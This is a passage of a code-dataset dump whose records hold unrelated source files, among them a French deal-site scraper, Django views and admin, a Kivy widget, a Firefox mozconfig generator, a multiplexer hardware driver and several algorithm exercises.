flame = False\n for img in soup.find_all('img', alt=True):\n if 'flamme' in img['alt']: \n flame = True\n return flame\n\ndef fetch_url(url):\n try:\n response = urlopen(url, timeout = 3) \n if response:\n content = response.read()\n response.close()\n return content\n else : \n print('Deal not fetched')\n raise\n except socket.error as socketerror:\n print(\"Request timed out\")\n print(\"Error: \", socketerror)\n raise\n\ndef get_raw_body(soup):\n raw_body = soup.find('div', {'class' : 'margin_gesture'})\n return raw_body\n\ndef get_raw_comments(soup):\n raw_comments = soup.find('div', {'class' : 'body_detail_page'})\n return raw_comments \n\n# This function is faster if you need both title and seller\ndef get_title_seller(soup):\n title = soup.find('h1', {\"class\" : \"text_color_333333\"})\n title = ''.join(title.find_all(text = True)).replace(\"Expiré\",'')\n titleSplit = title.split(' @ ')\n title = titleSplit[0]\n seller = titleSplit[1]\n return (title, seller)\n\ndef get_title(content):\n return get_title_seller(content)[0]\n\ndef get_seller(soup):\n return get_title_seller(soup)[1]\n\ndef get_temperature(soup):\n temperature = soup.find('div', {'class' : 'temperature_div'}).p.string\n if temperature == \"new\" : \n temperature = 0\n else : \n temperature = temperature.replace('°','')\n temperature = int(temperature)\n return temperature\n\ndef get_description(soup):\n desc = soup.find('div', {\"class\" : \"description text_color_333333\"}) \n desc = ''.join(desc.find_all(text = True))\n return desc\n\n# This function is faster if you need both name and url\ndef get_poster_name_url(soup):\n poster = soup.find('div', {\"class\" : \"poster_profil_div\"})\n poster_name = poster.a.string\n poster_url = poster.a['href']\n return (poster_name, poster_url)\n\ndef get_poster_name(soup):\n return get_poster_name_url(soup)[0]\n\ndef get_poster_url(soup):\n return get_poster_name_url(soup)[1]\n\ndef get_dates(soup):\n date_string = soup.find('p', {\"class\" : \"dates_deal text_color_b4b4b4\"})\n date_string = ''.join(date_string.find_all(text = True))\n i = date_string.find(\"Post\")\n date_string = date_string[i : ]\n i = date_string.find(\"le\") + 3\n date = date_string[i : i + 10 ]\n time = date_string[i+13 : i+18]\n time = time.replace('h', ':')\n posted_date = strptime(date + ' ' + time, '%d/%m/%Y %H:%M')\n \n hot_date = None\n hot_time = None\n i = date_string.find(\"Rendu hot\")\n if i != -1:\n date_string = date_string[i : ]\n i = date_string.find(\"le\") + 3\n date = date_string[i : i + 10 ]\n time = date_string[i+13 : i+18]\n time = time.replace('h', ':')\n hot_date = strptime(date + ' ' + time, '%d/%m/%Y %H:%M')\n hot_time = int(mktime(hot_date) - mktime(posted_date))\n\n return (posted_date, hot_date, hot_time)\n\ndef get_posted_date(soup):\n return get_dates(soup)[0]\n\ndef get_hot_date(soup):\n return get_dates(soup)[1]\n \ndef clean_text(text):\n # Remove non-letters\n letters_only = re.sub(\"[^0-9a-zA-Zéèàâêôûîùïë]\", \" \", text)\n words = letters_only.lower().split() \n # Searching a set is much faster than searching a list, so convert the stop words to a set\n stops = set(['au', 'aux', 'avec', 'ce', 'ces', 'dans', 'de', 'des', 'du', \n 'elle', 'en', 'et', 'eux', 'il', 'je', 'la', 'le', 'leur', \n 'lui', 'ma', 'mais', 'me', 'même', 'mes', 'moi', 'mon', 'ne', \n 'nos', 'notre', 'nous', 'on', 'ou', 'par', 'pas', 'pour', 'qu', \n 'que', 'qui', 'sa', 'se', 'ses', 'son', 'sur', 'ta', 'te', 'tes', \n 'toi', 'ton', 'tu', 'un', 'une', 'vos', 'votre', 'vous', 'c', 'd', \n 'j', 'l', 
'à', 'm', 'n', 's', 't', 'y', 'été', 'étée', 'étées', \n 'étés', 'étant', 'étante', 'étants', 'étantes', 'suis', 'es', \n 'est', 'sommes', 'êtes', 'sont', 'serai', 'seras', 'sera', 'serons', \n 'serez', 'seront', 'serais', 'serait', 'serions', 'seriez', 'seraient', \n 'étais', 'était', 'étions', 'étiez', 'étaient', 'fus', 'fut', 'fûmes', \n 'fûtes', 'furent', 'sois', 'soit', 'soyons', 'soyez', 'soient', 'fusse', \n 'fusses', 'fût', 'fussions', 'fussiez', 'fussent', 'ayant', 'ayante', \n 'ayantes', 'ayants', 'eu', 'eue', 'eues', 'eus', 'ai', 'as', 'avons', \n 'avez', 'ont', 'aurai', 'auras', 'aura', 'aurons', 'aurez', 'auront', \n 'aurais', 'aurait', 'aurions', 'auriez', 'auraient', 'avais', 'avait', \n 'avions', 'aviez', 'avaient', 'eut', 'eûmes', 'eûtes', 'eurent', 'aie', \n 'aies', 'ait', 'ayons', 'ayez', 'aient', 'eusse', 'eusses', 'eût', \n 'eussions', 'eussiez', 'eussent'])\n meaningful_words = [w for w in words if not w in stops] \n # TODO: add stemming \n return( \" \".join( meaningful_words )) \n\n\ndef get_db(): \n client = pymongo.MongoClient('192.168.0.141', 27017)\n db = client.dealabs\n return db\n\ndef send_message(subject, body):\n print('Sending message: '+ subject)\n emails = [\"louisrtm@gmail.com\", \"j.parmoli@yahoo.fr\"]\n for email in emails:\n msg = MIMEText(body)\n msg[\"From\"] = \"alert@lrt.ovh\"\n msg[\"To\"] = email\n msg[\"Subject\"] = subject\n p = Popen([\"/usr/sbin/sendmail\", \"-t\", \"-oi\"], stdin=PIPE, universal_newlines=True)\n p.communicate(msg.as_string())","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"498757158","text":"import json\nfrom django.http import HttpResponse\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\n\ndef index(request):\n # Reading data back\n with open('app/static/json/blogList.json', 'rb') as f:\n resp = json.load(f)\n\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n\ndef item(request, article_id):\n url = 'http://wcf.open.cnblogs.com/blog/post/body/' + str(article_id)\n req = urllib.request.Request(url)\n webpage = urllib.request.urlopen(req)\n html = webpage.read()\n soup = BeautifulSoup(html, 'html.parser') # 文档对象\n data = soup.find_all('string')[0].string\n\n return HttpResponse(data)\n","sub_path":"app/api/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649233538","text":"cont = 1\n# sexo\nhomem = 0\nmulher = 0\n# alturas\nAlt_homem = 0.0\nAlt_mulher = 0.0\n# altura maior e menor\nmaior_homem = 0\nmenor_homem = 0\nmaior_mulher = 0 \nmenor_mulher = 0 \n\n# Para calcular a altura média das mulheres\nSoma_altura_mulher = 0 \n\nwhile cont <= 50:\n sexo = input(\"Digite M (masculino) e F (Feminino): \")\n\n if sexo == \"M\":\n homem = homem + 1\n Alt_homem = float(input(\"Digite sua altura\"))\n # verifica se é maior ou menor\n if Alt_homem >= maior_homem:\n maior_homem = Alt_homem\n elif Alt_homem >= menor_homem:\n menor_homem = Alt_homem\n cont = cont + 1\n elif sexo == \"F\":\n mulher = mulher + 1\n Alt_mulher = float(input(\"Digite sua altura\"))\n #soma da altura de mulheres\n Soma_altura_mulher = Soma_altura_mulher + Alt_mulher\n\n # verifica se é maior ou menor\n if Alt_mulher >= maior_mulher:\n maior_mulher = Alt_mulher\n elif Alt_mulher >= menor_mulher:\n menor_mulher = Alt_mulher\n cont = cont + 1\n else:\n 
print(\"sexo inválido\")\n\n# resultados\nprint(\"A Altura maior e menor entre: \\n Homens: \", maior_homem, menor_homem, \" \\n Mulheres: \", maior_mulher, menor_mulher)\nprint(Soma_altura_mulher/mulher)\nprint(\"Numero de Homen: \", homem)\n\n# percentuais\nper_homem = (homem / 50) * 100\nper_mulher = (mulher / 50) * 100\ndif_percentual = per_homem - per_mulher\nprint(\"A diferença de percentual entre homens e as mulheres é: \", dif_percentual)","sub_path":"LaçoRepetição/List exercício 3/exer18.py","file_name":"exer18.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148397385","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.properties import ObjectProperty, StringProperty\nfrom kivy.uix.gridlayout import GridLayout\n\nroot = Builder.load_string('''\n\n:\n rows : 3\n canvas.before:\n Color:\n rgba: .5, .5, .5, 1\n Line:\n width: 2\n rectangle: self.x, self.y, self.width, self.height\n BoxLayout:\n Label:\n text: 'Апгар 1 минуты' \n Label:\n text: root.apgar_1\n BoxLayout:\n Label:\n text: 'Апгар 5 минуты' \n Label:\n text: root.apgar_5\n \n BoxLayout\n Label: \n text: root.actions\n\n\n\n''')\n\n\nclass Results(GridLayout):\n actions = StringProperty()\n apgar_1 = StringProperty()\n apgar_5= StringProperty()\n price = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n # self.actions = 'Исход положительный'\n self.actions = 'Состояние тяжелое'\n self.apgar_1 = f'0'\n self.apgar_5 = f'5'\n\n def update(self):\n self.apgar_1 = str(App.get_running_app().apgar_1)\n self.apgar_5 = str(App.get_running_app().apgar_5)\n","sub_path":"widgets/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235735831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom proposals.actions import export_as_csv_action, send_confirmation_action\nfrom proposals.models import ProposalSection, Proposal\nfrom proposals.models import ProposalKind\n\n\n@admin.register(Proposal)\nclass ProposalAdmin(admin.ModelAdmin):\n list_display = [\n \"id\",\n \"title\",\n \"speaker\",\n \"speaker_email\",\n \"kind\",\n \"audience_level\",\n \"language\",\n \"get_avg\",\n \"get_reviews\",\n \"notified\",\n ]\n list_filter = [\"kind__name\", \"notified\"]\n actions = [\n export_as_csv_action(\"CSV Export\", fields=[\n \"id\",\n \"title\",\n \"speaker\",\n \"speaker_email\",\n \"kind\",\n \"audience_level\",\n \"language\",\n \"avg_property\",\n \"reviews_property\",\n ]),\n send_confirmation_action(\"Sends confirmation email\")\n ]\n\n def get_avg(self, instance):\n return instance.avg()\n get_avg.short_description = _(\"Media\")\n\n def get_reviews(self, instance):\n return instance.reviews_property\n get_reviews.short_description = _(\"Revisiones\")\n\nadmin.site.register(ProposalSection)\nadmin.site.register(ProposalKind)\n","sub_path":"pycones/proposals/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520080197","text":"#!/usr/bin/python3\nfrom sys import stdin\nfrom bisect import bisect_left\n\ndef LongestIncreasingSubsequenceLength (v, n):\n if n == 0: return 0\n tail = [0] * n\n length = 1 # always 
points empty slot in tail\n tail [0] = v [0]\n for i in range (1, n):\n if v [i] > tail [length - 1]:\n tail [length] = v [i]\n length += 1\n else: tail [bisect_left (tail, v [i], 0, length - 1)] = v [i]\n return length\n \ndef main ():\n read = stdin.readline\n t = int (read ())\n for t_ in range (t):\n n = int (read ())\n A = list (map (int, read ().split ()))\n B = list (map (int, read ().split ()))\n sub = [0] * (n + 1)\n sb = [p [1] for p in sorted (zip (A, B))]\n print (LongestIncreasingSubsequenceLength (sb, n))\n \nif __name__ == \"__main__\": main ()","sub_path":"_select_the_subset_long_inc_sub_seq.py","file_name":"_select_the_subset_long_inc_sub_seq.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205224388","text":"# todo:\n# - make get_configs_from_args return an object\n\nimport argparse\nimport os\nimport platform\nimport sys\n\ndef platform_is_64bit():\n return sys.maxsize > 2 ** 32\n\ndef add_common_config_arguments(parser):\n opt_group = parser.add_mutually_exclusive_group()\n opt_group.add_argument('-o', '--opt', action='store_true', help = 'Optimized build')\n opt_group.add_argument('-d', '--optdebug', action='store_true',\n help = 'Optimized build with assertions enabled')\n\n if platform_is_64bit():\n parser.add_argument('--32bit', action='store_true', dest='target32',\n help='Cross compile 32bit build on 64bit host')\n\n san_group = parser.add_mutually_exclusive_group()\n san_group.add_argument('--tsan', action='store_true', help='Thread sanitizer build')\n san_group.add_argument('--asan', action='store_true', help='Address sanitizer build')\n san_group.add_argument('--valgrind', action='store_true', help='Valgrind build')\n\n parser.add_argument('--small-chunk', action='store_true',\n help='Use 256KM chunks instead of the usual 1MB')\n\n parser.add_argument('--concurrent', action='store_true',\n help='GC support for concurrent marking')\n\ndef add_browser_config_arguments(parser):\n add_common_config_arguments(parser)\n parser.add_argument('--minimal', action='store_true',\n help='Disable optional functionality to reduce build time')\n\ndef add_shell_config_arguments(parser):\n add_common_config_arguments(parser)\n parser.add_argument('--armsim', action='store_true', help='ARM simulator build')\n\ndef get_configs_from_args(args):\n names = []\n options = []\n\n def config(name):\n # Not all names may be present\n return getattr(args, name, False)\n\n options.append(\"--with-ccache=$HOME/.mozbuild/sccache/sccache\")\n\n if config('minimal'):\n names.append('minimal')\n options.append('--disable-av1')\n options.append('--disable-cranelift')\n options.append('--disable-ffmpeg')\n options.append('--disable-js-shell')\n options.append('--disable-printing')\n options.append('--disable-synth-speechd')\n options.append('--disable-webspeech')\n options.append('--disable-webrtc')\n\n if config('small_chunk'):\n names.append('smallChunk')\n options.append('--enable-small-chunk-size')\n\n if config('concurrent'):\n names.append('concurrent')\n options.append('--enable-gc-concurrent-marking')\n\n if config('target32'):\n names.append('32bit')\n options.append('--target=i686-pc-linux')\n\n if config('opt'):\n names.append('opt')\n options.append('--enable-optimize')\n options.append('--disable-debug')\n elif config('optdebug'):\n names.append('optdebug')\n options.append('--enable-optimize')\n options.append('--enable-debug')\n options.append('--enable-gczeal')\n else:\n 
options.append('--disable-optimize')\n options.append('--enable-debug')\n options.append('--enable-gczeal')\n\n if config('tsan'):\n names.append('tsan')\n options.append('--enable-thread-sanitizer')\n options.append('export RUSTFLAGS=\"-Zsanitizer=thread\"')\n options.append('unset RUSTFMT')\n add_sanitizer_options(args, options)\n elif config('asan'):\n names.append('asan')\n options.append('--enable-address-sanitizer')\n add_sanitizer_options(args, options)\n elif config('valgrind'):\n names.append('valgrind')\n options.append('--enable-valgrind')\n options.append('--disable-jemalloc')\n if '--enable-optimize' in options:\n options.remove('--enable-optimize')\n options.append('--enable-optimize=\"-Og -g\"')\n\n if config('armsim'):\n platform = 'arm'\n if platform_is_64bit() and not config('target32'):\n platform = 'arm64'\n names.append(platform + 'sim')\n options.append('--enable-simulator=' + platform)\n\n if config('shell'):\n names.append('shell')\n options.append('--enable-application=js')\n if not config('tsan') and not config('asan'):\n options.append('--enable-warnings-as-errors')\n\n return names, options\n\ndef add_sanitizer_options(args, options):\n # From https://firefox-source-docs.mozilla.org/tools/sanitizer/tsan.html\n # See also build/unix/mozconfig.tsan, mozconfig.asan\n options.append('--disable-jemalloc')\n options.append('--disable-profiling')\n options.append('--enable-debug-symbols')\n options.append('--disable-install-strip')\n if '--enable-optimize' in options:\n options.remove('--enable-optimize')\n options.append('--enable-optimize=\"-O2 -gline-tables-only\"')\n if not args.shell:\n options.append('--disable-elf-hack')\n options.append('--disable-crashreporter')\n options.append('--disable-sandbox')\n options.append('export MOZ_DEBUG_SYMBOLS=1')\n\ndef get_build_name(config_names):\n \"\"\"\n Get a canonical build name from a list of configs.\n \"\"\"\n name_elements = config_names.copy()\n if not name_elements:\n name_elements.append(\"default\")\n return '-'.join(name_elements)\n\ndef write_mozconfig(build_dir, options, build_config):\n with open(build_config, \"w\") as file:\n def w(line):\n file.write(f\"{line}\\n\")\n\n w(f\"mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/{build_dir}\")\n w(\"mk_add_options AUTOCLOBBER=1\")\n for option in options:\n if option.startswith('--'):\n w(f\"ac_add_options {option}\")\n else:\n w(option)\n\ndef setup_environment(args):\n if platform.system() == 'Linux' and args.target32:\n os.environ['PKG_CONFIG_PATH']='/usr/lib/x86_64-linux-gnu/pkgconfig'\n","sub_path":"lib/mozconfig.py","file_name":"mozconfig.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316684233","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSoftWEAR Multiplexer module. Uses device SN74LV4051A as an analog multiplexer\r\nwith 8 channels. The high level class implements potential MUXes on multiple\r\nchannels. Hardware detection feature provided.\r\n\"\"\"\r\nimport mraa # Main peripheral class. Implements basic digital I/O \r\nimport RoboUtil as util # Utility library to keep track of used I/O pins\r\n\r\nclass RoboMUX:\r\n \"\"\" Implements multiplexer capabilities for all possible channels of an\r\n peripheral. \"\"\"\r\n class MUX:\r\n \"\"\" Implements a single multiplexer for one peripheral channel. \"\"\"\r\n def __init__(self, peripheral, channel, select_pins, detect_pin):\r\n \"\"\" Class constructor. 
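`write_mozconfig` above turns an option list into a mozconfig file: entries starting with `--` become `ac_add_options` lines, and anything else (exports, unsets) is written verbatim after the two `mk_add_options` headers. A condensed sketch of the same emission rules that returns the text instead of writing a file, fed an options list of the kind `get_configs_from_args` produces:

```python
def render_mozconfig(build_dir, options):
    # Mirrors the emission rules in write_mozconfig above.
    lines = [
        f"mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/{build_dir}",
        "mk_add_options AUTOCLOBBER=1",
    ]
    for option in options:
        if option.startswith('--'):
            lines.append(f"ac_add_options {option}")
        else:
            lines.append(option)
    return "\n".join(lines)

print(render_mozconfig("obj-opt", [
    "--enable-optimize", "--disable-debug", "export MOZ_DEBUG_SYMBOLS=1",
]))
```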
The select pins are from LSB to MSB [A, B, C] \"\"\" \r\n \r\n self.peripheral = peripheral # Save peripheral\r\n self.chn = channel # Save channel\r\n if len(select_pins) is not 3: # Test input parameter validity\r\n raise ValueError(\"Parameter error: the MUX need exactly 3 select pins\")\r\n \r\n \"\"\" Init first select pin as output, and put it to 0 \"\"\"\r\n self._pin_a = mraa.Gpio(util.gpio2mraa[select_pins[0]])\r\n self._pin_a.dir(mraa.DIR_OUT)\r\n self._pin_a.write(0)\r\n \r\n \"\"\" Init second select pin as output, and put it to 0 \"\"\"\r\n self._pin_b = mraa.Gpio(util.gpio2mraa[select_pins[1]])\r\n self._pin_b.dir(mraa.DIR_OUT)\r\n self._pin_b.write(0)\r\n \r\n \"\"\" Init third select pin as output, and put it to 0 \"\"\"\r\n self._pin_c = mraa.Gpio(util.gpio2mraa[select_pins[2]])\r\n self._pin_c.dir(mraa.DIR_OUT)\r\n self._pin_c.write(0)\r\n \r\n \"\"\" Init the detect pin and set it as input \"\"\"\r\n self._pin_detect = mraa.Gpio(util.gpio2mraa[detect_pin])\r\n self._pin_detect.dir(mraa.DIR_IN)\r\n \r\n def select(self, mux_chn):\r\n \"\"\" Selects a MUX channel (0-7). Any future operations will happen \r\n on this selected channel. \"\"\"\r\n if mux_chn < 0 or mux_chn > 7: # Test parameter validity\r\n raise ValueError(\"Parameter error: the MUX has only 8 channels (0-7)\")\r\n if mux_chn & 4 == 4: # Test MSB bit set?\r\n self._pin_c.write(1) # Reflect change on pin C (MSB)\r\n else:\r\n self._pin_c.write(0)\r\n \r\n if mux_chn & 2 == 2: # Test middle bit set?\r\n self._pin_b.write(1) # Reflect change on pin B (middle)\r\n else:\r\n self._pin_b.write(0)\r\n \r\n if mux_chn & 1 == 1: # Test LSB bit set?\r\n self._pin_a.write(1) # Reflect change on pin A (LSB)\r\n else:\r\n self._pin_a.write(0)\r\n \r\n def isMuxConnected(self):\r\n \"\"\" Returns True if the detect pin is High, False otherwise \"\"\"\r\n return bool(self._pin_detect.read())\r\n \r\n \"\"\" The mraa pin objects used by the MUX. \"\"\"\r\n _pin_a = None # The LSB select pin\r\n _pin_b = None\r\n _pin_c = None # The MSB select pin\r\n _pin_detect = None # The detect pin\r\n \r\n \"\"\" Peripheral type. Can be: ADC, I2C, UART, SPI \"\"\"\r\n peripheral = ''\r\n \r\n \"\"\" Channel of the connected peripheral. \"\"\"\r\n chn = '0'\r\n \r\n def __init__(self):\r\n \"\"\" \"\"\"\r\n self._mux_list = []\r\n self._peripheral = ''\r\n \r\n def add_mux_slot(self, peripheral, channel, select_pins, detect_pin):\r\n if peripheral not in ['ADC', 'I2C', 'UART', 'SPI' ]:\r\n raise ValueError(\"Parameter error: peripheral should be ADC, I2C, UART or SPI\") \r\n for pin in select_pins:\r\n if pin not in util.gpio2mraa:\r\n raise ValueError(\"Parameter error: Pin is not a valid GPIO pin\")\r\n if pin in util.UsedGPIO.pin_list:\r\n raise ValueError(\"Parameter error: Pin is already used elsewhere\")\r\n if detect_pin not in util.gpio2mraa:\r\n raise ValueError(\"Parameter error: Pin is not a valid GPIO pin\")\r\n if detect_pin in util.UsedGPIO.pin_list:\r\n raise ValueError(\"Parameter error: Pin is already used elsewhere\")\r\n \r\n if self._peripheral == '':\r\n self._peripheral = peripheral\r\n elif self._peripheral != peripheral:\r\n raise RuntimeError(\"Cannot mix MUX peripherals in the same class!\")\r\n \r\n new_mux = self.MUX(peripheral, channel, select_pins, detect_pin)\r\n self._mux_list.append(new_mux)\r\n \r\n def get_muxed_values(self, channel, func, *args, **kwargs):\r\n \"\"\" Calls the given function with all the arguments and returns a list\r\n of all the return values. 
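`MUX.select` above decomposes a channel number (0-7) into the three select bits of the SN74LV4051A, with the LSB on pin A and the MSB on pin C. The same decomposition without any hardware dependency, handy for sanity-checking a wiring table:

```python
def select_bits(mux_chn):
    # (A, B, C) levels matching the bit tests in MUX.select above.
    if not 0 <= mux_chn <= 7:
        raise ValueError("the MUX has only 8 channels (0-7)")
    a = mux_chn & 1         # LSB -> pin A
    b = (mux_chn >> 1) & 1  # middle bit -> pin B
    c = (mux_chn >> 2) & 1  # MSB -> pin C
    return a, b, c

for chn in range(8):
    print(chn, select_bits(chn))  # e.g. 5 -> (1, 0, 1)
```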
If no Mux connected, just returns the \r\n func result. \"\"\"\r\n # Get the MUX from the list for the given channel\r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return func(*args, **kwargs)\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n ret = [] # Initialize return object to an empty list\r\n \r\n # If MUX exists but is disconnected -> execute and return the function\r\n if c_mux.isMuxConnected() == False:\r\n return func(*args, **kwargs)\r\n \r\n # If MUX exists and is connected -> go through all channels\r\n for idx in range(0,8):\r\n c_mux.select(idx) # Select MUX channel than execute the function\r\n ret.append(func(*args, **kwargs))\r\n return ret # Return the results\r\n \r\n def func_on_mux_chn(self, channel, mux_chn, func, *args, **kwargs):\r\n \"\"\" Executes and returns the given function on the provided MUX channel.\r\n If no MUX is connected, just execute and return the function. \"\"\"\r\n # Get the MUX from the list for the given channel \r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return func(*args, **kwargs)\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n c_mux.select(mux_chn) # Select the MUX channel\r\n return func(*args, **kwargs) # Execute the function\r\n \r\n def get_mux_connected(self, channel):\r\n \"\"\" Returns True if the MUX is connected, False otherwise \"\"\"\r\n c_mux = [mux for mux in self._mux_list if mux.chn == channel]\r\n \r\n if len(c_mux) > 1: # If more than 1 MUX -> signal error\r\n raise RuntimeError(\"The \" + self._peripheral + \" channel \" + str(channel) + \" has too many MUX objects!\")\r\n if len(c_mux) == 0: # If no MUX -> execute and return the function\r\n return False\r\n \r\n c_mux = c_mux[0] # Just 1 MUX -> select it \r\n return c_mux.isMuxConnected()\r\n \r\n \"\"\" Internal list of MUX objects. 1 MUX object per channel \"\"\"\r\n _mux_list = []\r\n \r\n \"\"\" Peripheral for which this MUX class is instantiated. Does not allow\r\n more than 1 peripheral per class instantiation. 
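`get_muxed_values` above fans a single read function out across all eight MUX channels, or falls back to one plain call when no MUX is detected on that peripheral channel. A usage sketch with a stubbed reader; it cannot run without mraa and the SoftWEAR board, and the pin numbers and `read_adc` stub are hypothetical:

```python
# Hypothetical wiring: ADC channel 0, select pins on GPIO 10/11/12,
# detect pin on GPIO 13 (substitute the pins of the actual board).
mux = RoboMUX()
mux.add_mux_slot('ADC', 0, select_pins=[10, 11, 12], detect_pin=13)

def read_adc():
    return 0.42  # stand-in for a real peripheral read

# One value if no MUX is connected, a list of eight values otherwise.
readings = mux.get_muxed_values(0, read_adc)
print(readings)
```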
\"\"\"\r\n _peripheral = ''\r\n","sub_path":"SoftWEAR/Python/RoboMUX.py","file_name":"RoboMUX.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267221097","text":"class Solution(object):\n def findMaximumXOR(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n maxVal = 0\n for i in range(0,len(nums)):\n for j in range(i+1,len(nums)):\n xor = nums[i]^nums[j]\n if xor>maxVal:\n maxVal = xor\n return maxVal\n","sub_path":"maximumXor.py","file_name":"maximumXor.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"182027119","text":"'''\r\nCreated on Dec 17, 2016\r\n\r\n@author: Keith gorlen@comcast.net\r\n\r\nReferences:\r\n https://projecteuler.net/problem=150\r\n https://en.wikipedia.org/wiki/Linear_congruential_generator\r\n'''\r\nimport numpy as np\r\nfrom fractions import gcd\r\n\r\ndef lcg(a, c, m):\r\n assert m & (m - 1) == 0, 'modulus not power of 2'\r\n assert (a - 1) & 3 == 0, 'a not divisible by 4'\r\n assert gcd(c, m) == 1, 'modulus and c not relatively prime'\r\n \r\n t = 0\r\n while True:\r\n t = (a*t + c) & (m - 1)\r\n yield t\r\n\r\ndef min_sum(A):\r\n assert len(A.shape) == 2, 'Not 2-dimensional'\r\n assert A.shape[0] == A.shape[1], 'Not square'\r\n assert not np.any(np.triu(A, 1)), 'Non-zero values in upper triangle'\r\n n = A.shape[0]\r\n minidx = divmod(np.argmin(A), n) + (1,) # index of minimum sum\r\n minsum = A[minidx[:2]] # minimum sum\r\n print(minidx, minsum)\r\n th_1 = np.copy(A) # sums of triangles with height h-1\r\n th_2 = np.zeros((n+1, n+1), dtype=np.int_) # sums of triangles with height h-2\r\n for h in range(2, n + 1):\r\n th = np.zeros((n, n), dtype=np.int_) # sums of triangles with height h\r\n for i in range(n - h + 1):\r\n th[i, :i+1] = A[i, :i+1] + th_1[i+1, :i+1] + th_1[i+1, 1:i+2] - th_2[i+2, 1:i+2] \r\n index = divmod(np.argmin(th), n)\r\n if th[index] < minsum:\r\n minsum = th[index]\r\n minidx = index + (h,)\r\n th_1, th_2 = th, th_1\r\n print(minidx, minsum)\r\n return minsum\r\n\r\nTest = [[ 15],\r\n [-14, -7],\r\n [ 20, -13, -5],\r\n [ -3, 8, 23, -26],\r\n [ 1, -4, -5, -18, 5],\r\n [-16, 31, 2, 9, 28, 3]]\r\nassert min_sum(np.reshape(np.fromiter([Test[idx[0]][idx[1]] if idx[1] <= idx[0] else 0\r\n for idx in [divmod(k, len(Test)) for k in range(len(Test)**2)]],\r\n dtype=int, count=len(Test)**2),\r\n (len(Test), -1))) == -42 \r\n\r\nN = 1000\r\nrandnum = lcg(615949, 797807, 1<<20)\r\nA = np.reshape(np.fromiter([next(randnum) - (1<<19) if idx[1] <= idx[0] else 0\r\n for idx in [divmod(k, N) for k in range(N*N)]],\r\n dtype=int, count=N*N),\r\n (N, -1))\r\nassert A[0,0] == 273519\r\nassert A[1,0] == -153582\r\nassert A[1,1] == 450905\r\n\r\nminsum = min_sum(A)\r\nprint(minsum)\r\nassert minsum == -271248680, \"WRONG!\"","sub_path":"p150_min_sum_subtriangle.py","file_name":"p150_min_sum_subtriangle.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562660528","text":"import os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\nfolder_path=os.getcwd()\n# background\nfile_name=r'background_MidFreq_300K_60s_20150525_203751.txt'\nfile_path=file_path=folder_path+os.path.sep+file_name\ncache=np.genfromtxt(file_path)\ndark_count=np.median(cache[:,1]) # two columns\n#dark_count=4150\n## Raman shift 
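The `lcg` generator above is the standard linear congruential recurrence t <- (a*t + c) mod m with a power-of-two modulus, and the Project Euler script pins down its first outputs (after recentring by 2^19) in its own assertions. Reproducing just that check as a standalone snippet, with the parameter asserts omitted for brevity:

```python
def lcg(a, c, m):
    t = 0
    while True:
        t = (a * t + c) & (m - 1)  # m must be a power of two
        yield t

rng = lcg(615949, 797807, 1 << 20)
vals = [next(rng) - (1 << 19) for _ in range(3)]
print(vals)  # [273519, -153582, 450905], matching the script's asserts
```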
